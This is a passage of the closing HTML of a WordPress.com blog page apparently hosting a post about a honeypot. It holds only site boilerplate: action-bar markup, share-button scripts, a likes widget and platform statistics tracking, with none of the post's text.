									<svg class="gridicon gridicons-customize" height="20" width="20" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M2 6c0-1.505.78-3.08 2-4 0 .845.69 2 2 2 1.657 0 3 1.343 3 3 0 .386-.08.752-.212 1.09.74.594 1.476 1.19 2.19 1.81L8.9 11.98c-.62-.716-1.214-1.454-1.807-2.192C6.753 9.92 6.387 10 6 10c-2.21 0-4-1.79-4-4zm12.152 6.848l1.34-1.34c.607.304 1.283.492 2.008.492 2.485 0 4.5-2.015 4.5-4.5 0-.725-.188-1.4-.493-2.007L18 9l-2-2 3.507-3.507C18.9 3.188 18.225 3 17.5 3 15.015 3 13 5.015 13 7.5c0 .725.188 1.4.493 2.007L3 20l2 2 6.848-6.848c1.885 1.928 3.874 3.753 5.977 5.45l1.425 1.148 1.5-1.5-1.15-1.425c-1.695-2.103-3.52-4.092-5.448-5.977z"/></g></svg>									<span>Customize</span>
								</a>
							</li>
																<li class="actnbr-folded-follow">
												<a class="actnbr-action actnbr-actn-follow " href="">
			<svg class="gridicon gridicons-reader-follow" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M23 16v2h-3v3h-2v-3h-3v-2h3v-3h2v3h3zM20 2v9h-4v3h-3v4H4c-1.1 0-2-.9-2-2V2h18zM8 13v-1H4v1h4zm3-3H4v1h7v-1zm0-2H4v1h7V8zm7-4H4v2h14V4z"/></g></svg><span>Follow</span>
		</a>
		<a class="actnbr-action actnbr-actn-following  no-display" href="">
			<svg class="gridicon gridicons-reader-following" height="24" width="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><g><path d="M23 13.482L15.508 21 12 17.4l1.412-1.388 2.106 2.188 6.094-6.094L23 13.482zm-7.455 1.862L20 10.89V2H2v14c0 1.1.9 2 2 2h4.538l4.913-4.832 2.095 2.176zM8 13H4v-1h4v1zm3-2H4v-1h7v1zm0-2H4V8h7v1zm7-3H4V4h14v2z"/></g></svg><span>Following</span>
		</a>
										</li>
																	<li class="actnbr-signup"><a href="https://wordpress.com/start/">Sign up</a></li>
									<li class="actnbr-login"><a href="https://wordpress.com/log-in?redirect_to=https%3A%2F%2Frighteousit.wordpress.com%2F2021%2F12%2F21%2Fhudaks-honeypot-part-2%2F&#038;signup_flow=account">Log in</a></li>
																	<li class="actnbr-shortlink"><a href="https://wp.me/prnH5-7L">Copy shortlink</a></li>
																	<li class="flb-report"><a href="http://en.wordpress.com/abuse/">Report this content</a></li>
																	<li class="actnbr-reader">
										<a href="https://wordpress.com/read/blogs/6525939/posts/481">
											View post in Reader										</a>
									</li>
																	<li class="actnbr-subs">
										<a href="https://subscribe.wordpress.com/">Manage subscriptions</a>
									</li>
																		<li class="actnbr-fold"><a href="">Collapse this bar</a></li>
															</ul>
					</div>
				</div>
			</li>
		</ul>
	</div>
	
<script>
window.addEventListener( "load", function( event ) {
	var link = document.createElement( "link" );
	link.href = "https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.css?v=20210915";
	link.type = "text/css";
	link.rel = "stylesheet";
	document.head.appendChild( link );

	var script = document.createElement( "script" );
	script.src = "https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.js?v=20211028";
	script.defer = true;
	document.body.appendChild( script );
} );
</script>

	
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/righteousit.wordpress.com\/2021\/12\/21\/hudaks-honeypot-part-2\/":481};
	</script>
				<script id='libre-2-script-js-extra'>
var libreadminbar = [""];
</script>
<script id='sharing-js-js-extra'>
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
</script>
<script crossorigin='anonymous' type='text/javascript' src='https://s1.wp.com/_static/??-eJyNj1tqAzEMRTcUxTSBPD5C1iLbmhnN2LJj2ZMuv06hobQQ8qULOvfCMfcMLkklqWZW42llR/lzO+vG/HrFBjm0kUVN4IXU3Bo1mlB8oPIXrhPFjuRmO2wLwe4x/R3fQwVXHrFykvd4XThDYFlgSK4pDPxPwIY0PhXuqXj0Ci6gap/rEy7mrW0PnRfq6CMLWCwmolYqPUEt6BZ9UcpJKwwBuRidsLCMP7eXrvHycdifj/vj7nSevwCrQpJS'></script>
<script type='text/javascript'>
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-twitter' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-twitter' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-facebook' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-facebook' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
						return false;
					}
				} );
			} )();
</script>
<script type="text/javascript">
// <![CDATA[
(function() {
try{
  if ( window.external &&'msIsSiteMode' in window.external) {
    if (window.external.msIsSiteMode()) {
      var jl = document.createElement('script');
      jl.type='text/javascript';
      jl.async=true;
      jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php';
      var s = document.getElementsByTagName('script')[0];
      s.parentNode.insertBefore(jl, s);
    }
  }
}catch(e){}
})();
// ]]>
</script>	<iframe src='https://widgets.wp.com/likes/master.html?ver=20220105#ver=20220105&amp;origin=https://righteousit.wordpress.com' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe>
	<div id='likes-other-gravatars'>
		<div class="likes-text">
			<span>%d</span> bloggers like this:		</div>
		<ul class="wpl-avatars sd-like-gravatars"></ul>
	</div>

		<script src="//stats.wp.com/w.js?63" defer></script> <script type="text/javascript">
_tkq = window._tkq || [];
_stq = window._stq || [];
_tkq.push(['storeContext', {'blog_id':'6525939','blog_tz':'-7','user_lang':'en','blog_lang':'en','user_id':'0'}]);
_stq.push(['view', {'blog':'6525939','v':'wpcom','tz':'-7','user_id':'0','post':'481','subd':'righteousit'}]);
_stq.push(['extra', {'crypt':'UE5XaGUuOTlwaD85flAmcm1mcmZsaDhkV11YdWFnNncxc1tjZG9XVXhRaGp+TjRjdF9qRytURmxYWFJHLX54ek1OVlpUMWo2YmgwRU50RTIrPUYmSGJiMXhfT2h6aHRqU3dseGF2Z3Aldm83QXBobzlMaFNSczVFcGI5eUNxaD02emowTkhReWM4ZUFYM2ZnR0dkZE5pR1V+cVd3ajUuPVlTTmN2ZDNvP3dIUjZdYjhRcDY5NjVicXxDVFhiTTBjflZpRitHc3AmUUMvKzRhNixvWEd1NERtU2FfLFNLTSVreThKL2l1JTksZFVt'}]);
_stq.push([ 'clickTrackerInit', '6525939', '481' ]);
	</script>
<noscript><img src="https://pixel.wp.com/b.gif?v=noscript" style="height:1px;width:1px;overflow:hidden;position:absolute;bottom:1px;" alt="" /></noscript>
<script>
if ( 'object' === typeof wpcom_mobile_user_agent_info ) {

	wpcom_mobile_user_agent_info.init();
	var mobileStatsQueryString = "";
	
	if( false !== wpcom_mobile_user_agent_info.matchedPlatformName )
		mobileStatsQueryString += "&x_" + 'mobile_platforms' + '=' + wpcom_mobile_user_agent_info.matchedPlatformName;
	
	if( false !== wpcom_mobile_user_agent_info.matchedUserAgentName )
		mobileStatsQueryString += "&x_" + 'mobile_devices' + '=' + wpcom_mobile_user_agent_info.matchedUserAgentName;
	
	if( wpcom_mobile_user_agent_info.isIPad() )
		mobileStatsQueryString += "&x_" + 'ipad_views' + '=' + 'views';

	if( "" != mobileStatsQueryString ) {
		new Image().src = document.location.protocol + '//pixel.wp.com/g.gif?v=wpcom-no-pv' + mobileStatsQueryString + '&baba=' + Math.random();
	}
	
}
</script>
</body>
</html>
